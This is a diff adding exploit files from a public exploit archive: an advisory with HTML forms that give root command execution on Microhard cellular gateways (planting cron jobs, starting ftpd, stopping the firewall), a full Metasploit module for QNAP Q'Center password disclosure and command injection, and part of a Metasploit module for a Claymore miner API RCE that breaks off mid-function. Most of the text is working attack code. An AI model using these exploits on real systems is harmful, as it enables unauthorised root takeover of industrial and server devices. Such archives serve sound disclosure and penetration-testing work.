287
exploits/hardware/webapps/45038.txt
Normal file
287
exploits/hardware/webapps/45038.txt
Normal file
|
@ -0,0 +1,287 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: The application suffers from multiple authenticated arbitrary remote code execution
|
||||||
|
vulnerabilities with highest privileges. This is due to multiple hidden and undocumented
|
||||||
|
features within the admin interface that allows an attacker to create crontab jobs and/or
|
||||||
|
modify the system startup script that allows execution of arbitrary code as root user.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5479
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
Crontab #1:
|
||||||
|
-----------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="submit" value="1" />
|
||||||
|
<input type="hidden" name="sltMinutes" value="" />
|
||||||
|
<input type="hidden" name="sltHours" value="" />
|
||||||
|
<input type="hidden" name="sltDays" value="" />
|
||||||
|
<input type="hidden" name="sltMonths" value="" />
|
||||||
|
<input type="hidden" name="sltDaysOfWeek" value="" />
|
||||||
|
<input type="hidden" name="txthMinutes" value="" />
|
||||||
|
<input type="hidden" name="txthHours" value="" />
|
||||||
|
<input type="hidden" name="txthDays" value="" />
|
||||||
|
<input type="hidden" name="txthMonths" value="" />
|
||||||
|
<input type="hidden" name="txthDaysOfWeek" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXminute" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXhour" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXday" value="" />
|
||||||
|
<input type="hidden" name="txtCommand" value="" />
|
||||||
|
<input type="hidden" name="txthCronEnabled" value="0" />
|
||||||
|
<input type="hidden" name="txtCrontabEntry" value="" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
|
||||||
|
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg04b4e9" value="*" />
|
||||||
|
<input type="hidden" name="HOURS_cfg04b4e9" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg04b4e9" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg04b4e9" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg04b4e9" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg04b4e9" value="id > /www/pwn.txt" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg04b4e9" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_newCron" value="" />
|
||||||
|
<input type="hidden" name="HOURS_newCron" value="" />
|
||||||
|
<input type="hidden" name="DAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="MONTHS_newCron" value="" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="COMMAND_newCron" value="" />
|
||||||
|
<input type="hidden" name="ENABLED_newCron" value="" />
|
||||||
|
<input type="hidden" name="action" value="Save Changes" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
curl http://192.168.1.1/pwn.txt
|
||||||
|
uid=0(root) gid=0(root) groups=0(root)
|
||||||
|
|
||||||
|
|
||||||
|
Start ftpd:
|
||||||
|
-----------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-startup.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="path" value="/etc/init.d" />
|
||||||
|
<input type="hidden" name="edit" value="custom-user-startup" />
|
||||||
|
<input type="hidden" name="filecontent" value="#!/bin/sh /etc/rc.common
|
||||||
|
START=90
|
||||||
|
# place your own startup commands here
|
||||||
|
#
|
||||||
|
# REMEMBER: You *MUST* place an '&' after launching programs you
|
||||||
|
# that are to continue running in the background.
|
||||||
|
#
|
||||||
|
# i.e.
|
||||||
|
# BAD: upnpd
|
||||||
|
# GOOD: upnpd &
|
||||||
|
#
|
||||||
|
# Failure to do this will result in the startup process halting
|
||||||
|
# on this file and the diagnostic light remaining on (at least
|
||||||
|
# for WRT54G(s) models).
|
||||||
|
#
|
||||||
|
|
||||||
|
ftpd &
|
||||||
|
|
||||||
|
" />
|
||||||
|
<input type="hidden" name="save" value=" Save Changes " />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
Crontab #2:
|
||||||
|
-----------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="submit" value="1" />
|
||||||
|
<input type="hidden" name="sltMinutes" value="" />
|
||||||
|
<input type="hidden" name="sltHours" value="" />
|
||||||
|
<input type="hidden" name="sltDays" value="" />
|
||||||
|
<input type="hidden" name="sltMonths" value="" />
|
||||||
|
<input type="hidden" name="sltDaysOfWeek" value="" />
|
||||||
|
<input type="hidden" name="txthMinutes" value="*" />
|
||||||
|
<input type="hidden" name="txthHours" value="*" />
|
||||||
|
<input type="hidden" name="txthDays" value="*" />
|
||||||
|
<input type="hidden" name="txthMonths" value="*" />
|
||||||
|
<input type="hidden" name="txthDaysOfWeek" value="*" />
|
||||||
|
<input type="hidden" name="ddEveryXminute" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXhour" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXday" value="" />
|
||||||
|
<input type="hidden" name="txtCommand" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
|
||||||
|
<input type="hidden" name="chkCronEnabled" value="on" />
|
||||||
|
<input type="hidden" name="txthCronEnabled" value="1" />
|
||||||
|
<input type="hidden" name="txtCrontabEntry" value="* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
|
||||||
|
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg0421ec" value="*" />
|
||||||
|
<input type="hidden" name="HOURS_cfg0421ec" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg0421ec" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg0421ec" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg0421ec" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg0421ec" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg0421ec" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_newCron" value="" />
|
||||||
|
<input type="hidden" name="HOURS_newCron" value="" />
|
||||||
|
<input type="hidden" name="DAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="MONTHS_newCron" value="" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="COMMAND_newCron" value="" />
|
||||||
|
<input type="hidden" name="ENABLED_newCron" value="" />
|
||||||
|
<input type="hidden" name="action" value="Save Changes" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
curl http://192.168.1.1/os.txt
|
||||||
|
Linux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux
|
||||||
|
drwxr-xr-x 5 root root 0 Jul 1 14:01 .
|
||||||
|
drwxr-xr-x 7 root root 0 Dec 31 1969 ..
|
||||||
|
-rw-r--r-- 1 root root 4 Apr 12 2010 .version
|
||||||
|
-rw-r--r-- 1 root root 13461 May 8 15:54 IPn4G.config
|
||||||
|
drwxr-xr-x 3 root root 0 Jun 20 2016 cgi-bin
|
||||||
|
-rw-r--r-- 1 root root 2672 Apr 1 2010 colorize.js
|
||||||
|
-rwxr-xr-x 1 root root 3638 May 10 2010 favicon.ico
|
||||||
|
drwxr-xr-x 2 root root 959 Jun 20 2016 images
|
||||||
|
-rw-r--r-- 1 root root 600 Feb 12 2013 index.html
|
||||||
|
drwxr-xr-x 2 root root 224 Jun 20 2016 js
|
||||||
|
-rw-r--r-- 1 root root 68 Mar 1 14:09 os.txt
|
||||||
|
drwxr-xr-x 2 root root 79 Jun 20 2016 svggraph
|
||||||
|
drwxr-xr-x 2 root root 0 Jul 1 14:02 themes
|
||||||
|
drwxr-xr-x 2 root root 0 May 8 16:21 vnstat
|
||||||
|
-rw-r--r-- 1 root root 953 Apr 1 2010 webif.js
|
||||||
|
uid=0(root) gid=0(root) groups=0(root)
|
||||||
|
|
||||||
|
|
||||||
|
Disable firewall:
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="submit" value="1" />
|
||||||
|
<input type="hidden" name="sltMinutes" value="" />
|
||||||
|
<input type="hidden" name="sltHours" value="" />
|
||||||
|
<input type="hidden" name="sltDays" value="" />
|
||||||
|
<input type="hidden" name="sltMonths" value="" />
|
||||||
|
<input type="hidden" name="sltDaysOfWeek" value="" />
|
||||||
|
<input type="hidden" name="txthMinutes" value="*" />
|
||||||
|
<input type="hidden" name="txthHours" value="*" />
|
||||||
|
<input type="hidden" name="txthDays" value="*" />
|
||||||
|
<input type="hidden" name="txthMonths" value="*" />
|
||||||
|
<input type="hidden" name="txthDaysOfWeek" value="*" />
|
||||||
|
<input type="hidden" name="ddEveryXminute" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXhour" value="" />
|
||||||
|
<input type="hidden" name="ddEveryXday" value="" />
|
||||||
|
<input type="hidden" name="txtCommand" value="/etc/init.d/firewall stop" />
|
||||||
|
<input type="hidden" name="chkCronEnabled" value="on" />
|
||||||
|
<input type="hidden" name="txthCronEnabled" value="1" />
|
||||||
|
<input type="hidden" name="txtCrontabEntry" value="* * * * * /etc/init.d/firewall stop" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
|
||||||
|
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_cfg04f65b" value="*" />
|
||||||
|
<input type="hidden" name="HOURS_cfg04f65b" value="*" />
|
||||||
|
<input type="hidden" name="DAYS_cfg04f65b" value="*" />
|
||||||
|
<input type="hidden" name="MONTHS_cfg04f65b" value="*" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_cfg04f65b" value="*" />
|
||||||
|
<input type="hidden" name="COMMAND_cfg04f65b" value="/etc/init.d/firewall stop" />
|
||||||
|
<input type="hidden" name="ENABLED_cfg04f65b" value="1" />
|
||||||
|
<input type="hidden" name="MINUTES_newCron" value="" />
|
||||||
|
<input type="hidden" name="HOURS_newCron" value="" />
|
||||||
|
<input type="hidden" name="DAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="MONTHS_newCron" value="" />
|
||||||
|
<input type="hidden" name="WEEKDAYS_newCron" value="" />
|
||||||
|
<input type="hidden" name="COMMAND_newCron" value="" />
|
||||||
|
<input type="hidden" name="ENABLED_newCron" value="" />
|
||||||
|
<input type="hidden" name="action" value="Save Changes" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
198
exploits/linux/remote/45043.rb
Executable file
198
exploits/linux/remote/45043.rb
Executable file
|
@ -0,0 +1,198 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => "QNAP Q'Center change_passwd Command Execution",
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a command injection vulnerability in the
|
||||||
|
`change_passwd` API method within the web interface of QNAP Q'Center
|
||||||
|
virtual appliance versions prior to 1.7.1083.
|
||||||
|
|
||||||
|
The vulnerability allows the 'admin' privileged user account to
|
||||||
|
execute arbitrary commands as the 'admin' operating system user.
|
||||||
|
|
||||||
|
Valid credentials for the 'admin' user account are required, however,
|
||||||
|
this module also exploits a separate password disclosure issue which
|
||||||
|
allows any authenticated user to view the password set for the 'admin'
|
||||||
|
user during first install.
|
||||||
|
|
||||||
|
This module has been tested successfully on QNAP Q'Center appliance
|
||||||
|
version 1.6.1075.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Ivan Huertas', # Discovery and PoC
|
||||||
|
'Brendan Coles' # Metasploit
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2018-0706'], # privesc
|
||||||
|
['CVE', '2018-0707'], # rce
|
||||||
|
['EDB', '45015'],
|
||||||
|
['URL', 'https://www.coresecurity.com/advisories/qnap-qcenter-virtual-appliance-multiple-vulnerabilities'],
|
||||||
|
['URL', 'http://seclists.org/fulldisclosure/2018/Jul/45'],
|
||||||
|
['URL', 'https://www.securityfocus.com/archive/1/542141'],
|
||||||
|
['URL', 'https://www.qnap.com/en-us/security-advisory/nas-201807-10']
|
||||||
|
],
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Targets' => [['Auto', { }]],
|
||||||
|
'CmdStagerFlavor' => %w[printf bourne wget],
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'Jul 11 2018',
|
||||||
|
'DefaultOptions' => {'RPORT' => 443, 'SSL' => true},
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options [
|
||||||
|
OptString.new('TARGETURI', [true, "Base path to Q'Center", '/qcenter/']),
|
||||||
|
OptString.new('USERNAME', [true, 'Username for the application', 'admin']),
|
||||||
|
OptString.new('PASSWORD', [true, 'Password for the application', 'admin'])
|
||||||
|
]
|
||||||
|
register_advanced_options [
|
||||||
|
OptBool.new('ForceExploit', [false, 'Override check result', false])
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.html')
|
||||||
|
|
||||||
|
unless res
|
||||||
|
vprint_error 'Connection failed'
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.code == 200 && res.body.include?("<title>Q'center</title>")
|
||||||
|
vprint_error "Target is not a QNAP Q'Center appliance"
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
version = res.body.scan(/\.js\?_v=([\d\.]+)/).flatten.first
|
||||||
|
if version.to_s.eql? ''
|
||||||
|
vprint_error "Could not determine QNAP Q'Center appliance version"
|
||||||
|
return CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
version = Gem::Version.new version
|
||||||
|
vprint_status "Target is QNAP Q'Center appliance version #{version}"
|
||||||
|
|
||||||
|
if version >= Gem::Version.new('1.7.1083')
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
def login(user, pass)
|
||||||
|
vars_post = {
|
||||||
|
name: user,
|
||||||
|
password: Rex::Text.encode_base64(pass),
|
||||||
|
remember: 'false'
|
||||||
|
}
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/login'),
|
||||||
|
'ctype' => 'application/json',
|
||||||
|
'data' => vars_post.to_json
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
fail_with Failure::Unreachable, 'Connection failed'
|
||||||
|
elsif res.code == 200 && res.body.eql?('{}')
|
||||||
|
print_good "Authenticated as user '#{user}' successfully"
|
||||||
|
elsif res.code == 401 || res.body.include?('AuthException')
|
||||||
|
fail_with Failure::NoAccess, "Invalid credentials for user '#{user}'"
|
||||||
|
else
|
||||||
|
fail_with Failure::UnexpectedReply, "Unexpected reply [#{res.code}]"
|
||||||
|
end
|
||||||
|
|
||||||
|
@cookie = res.get_cookies
|
||||||
|
if @cookie.nil?
|
||||||
|
fail_with Failure::UnexpectedReply, 'Failed to retrieve cookie'
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Retrieve list of user accounts
|
||||||
|
#
|
||||||
|
def account
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
|
||||||
|
'cookie' => @cookie
|
||||||
|
})
|
||||||
|
JSON.parse(res.body)['account']
|
||||||
|
rescue
|
||||||
|
print_error 'Could not retrieve list of users'
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Login to the 'admin' privileged user account
|
||||||
|
#
|
||||||
|
def privesc
|
||||||
|
print_status 'Retrieving admin user details ...'
|
||||||
|
|
||||||
|
admin = account.first
|
||||||
|
if admin.blank? || admin['_id'].blank? || admin['name'].blank? || admin['new_password'].blank?
|
||||||
|
fail_with Failure::UnexpectedReply, 'Failed to retrieve admin user details'
|
||||||
|
end
|
||||||
|
|
||||||
|
@id = admin['_id']
|
||||||
|
@pw = Rex::Text.decode_base64 admin['new_password']
|
||||||
|
print_good "Found admin password used during install: #{@pw}"
|
||||||
|
|
||||||
|
login admin['name'], @pw
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Change password to +new+ for user with ID +id+
|
||||||
|
#
|
||||||
|
def change_passwd(id, old, new)
|
||||||
|
vars_post = {
|
||||||
|
_id: id,
|
||||||
|
old_password: Rex::Text.encode_base64(old),
|
||||||
|
new_password: Rex::Text.encode_base64(new),
|
||||||
|
}
|
||||||
|
send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
|
||||||
|
'query' => 'change_passwd',
|
||||||
|
'cookie' => @cookie,
|
||||||
|
'ctype' => 'application/json',
|
||||||
|
'data' => vars_post.to_json
|
||||||
|
}, 5)
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(cmd, _opts)
|
||||||
|
change_passwd @id, @pw, "\";#{cmd};\""
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
unless [CheckCode::Detected, CheckCode::Appears].include? check
|
||||||
|
unless datastore['ForceExploit']
|
||||||
|
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||||
|
end
|
||||||
|
print_warning 'Target does not appear to be vulnerable'
|
||||||
|
end
|
||||||
|
|
||||||
|
login datastore['USERNAME'], datastore['PASSWORD']
|
||||||
|
|
||||||
|
if datastore['USERNAME'].eql? 'admin'
|
||||||
|
@id = @cookie.scan(/_ID=(.+?);/).flatten.first
|
||||||
|
@pw = datastore['PASSWORD']
|
||||||
|
else
|
||||||
|
privesc
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status 'Sending payload ...'
|
||||||
|
execute_cmdstager linemax: 10_000
|
||||||
|
end
|
||||||
|
end
|
185
exploits/multiple/remote/45044.rb
Executable file
185
exploits/multiple/remote/45044.rb
Executable file
|
@ -0,0 +1,185 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/exploit/powershell'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
include Msf::Exploit::Powershell
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Nanopool Claymore Dual Miner APIs RCE',
|
||||||
|
'Description' => %q{
|
||||||
|
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'reversebrain@snado', # Vulnerability reporter
|
||||||
|
'phra@snado' # Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['EDB', '44638'],
|
||||||
|
['CVE', '2018-1000049'],
|
||||||
|
['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
|
||||||
|
],
|
||||||
|
'Platform' => ['win', 'linux'],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Automatic Target', { 'auto' => true }],
|
||||||
|
[ 'Linux',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X64,
|
||||||
|
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Windows',
|
||||||
|
{
|
||||||
|
'Platform' => 'windows',
|
||||||
|
'Arch' => ARCH_X64,
|
||||||
|
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00"
|
||||||
|
},
|
||||||
|
'DisclosureDate' => 'Feb 09 2018',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
|
||||||
|
])
|
||||||
|
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
|
||||||
|
end
|
||||||
|
|
||||||
|
def select_target
|
||||||
|
data = {
|
||||||
|
"id" => 0,
|
||||||
|
"jsonrpc" => '2.0',
|
||||||
|
"method" => 'miner_getfile',
|
||||||
|
"params" => ['config.txt']
|
||||||
|
}.to_json
|
||||||
|
connect
|
||||||
|
sock.put(data)
|
||||||
|
buf = sock.get_once || ''
|
||||||
|
tmp = StringIO.new
|
||||||
|
tmp << buf
|
||||||
|
tmp2 = tmp.string
|
||||||
|
hex = ''
|
||||||
|
if tmp2.scan(/\w+/)[7]
|
||||||
|
return self.targets[2]
|
||||||
|
elsif tmp2.scan(/\w+/)[5]
|
||||||
|
return self.targets[1]
|
||||||
|
else
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
target = select_target
|
||||||
|
if target.nil?
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
data = {
|
||||||
|
"id" => 0,
|
||||||
|
"jsonrpc" => '2.0',
|
||||||
|
"method" => 'miner_getfile',
|
||||||
|
"params" => ['config.txt']
|
||||||
|
}.to_json
|
||||||
|
connect
|
||||||
|
sock.put(data)
|
||||||
|
buf = sock.get_once || ''
|
||||||
|
tmp = StringIO.new
|
||||||
|
tmp << buf
|
||||||
|
tmp2 = tmp.string
|
||||||
|
hex = ''
|
||||||
|
case target['Platform']
|
||||||
|
when 'linux'
|
||||||
|
hex = tmp2.scan(/\w+/)[5]
|
||||||
|
when 'windows'
|
||||||
|
hex = tmp2.scan(/\w+/)[7]
|
||||||
|
end
|
||||||
|
str = Rex::Text.hex_to_raw(hex)
|
||||||
|
if str.include?('WARNING')
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
vprint_error(e.message)
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
ensure
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(cmd, opts = {})
|
||||||
|
target = select_target
|
||||||
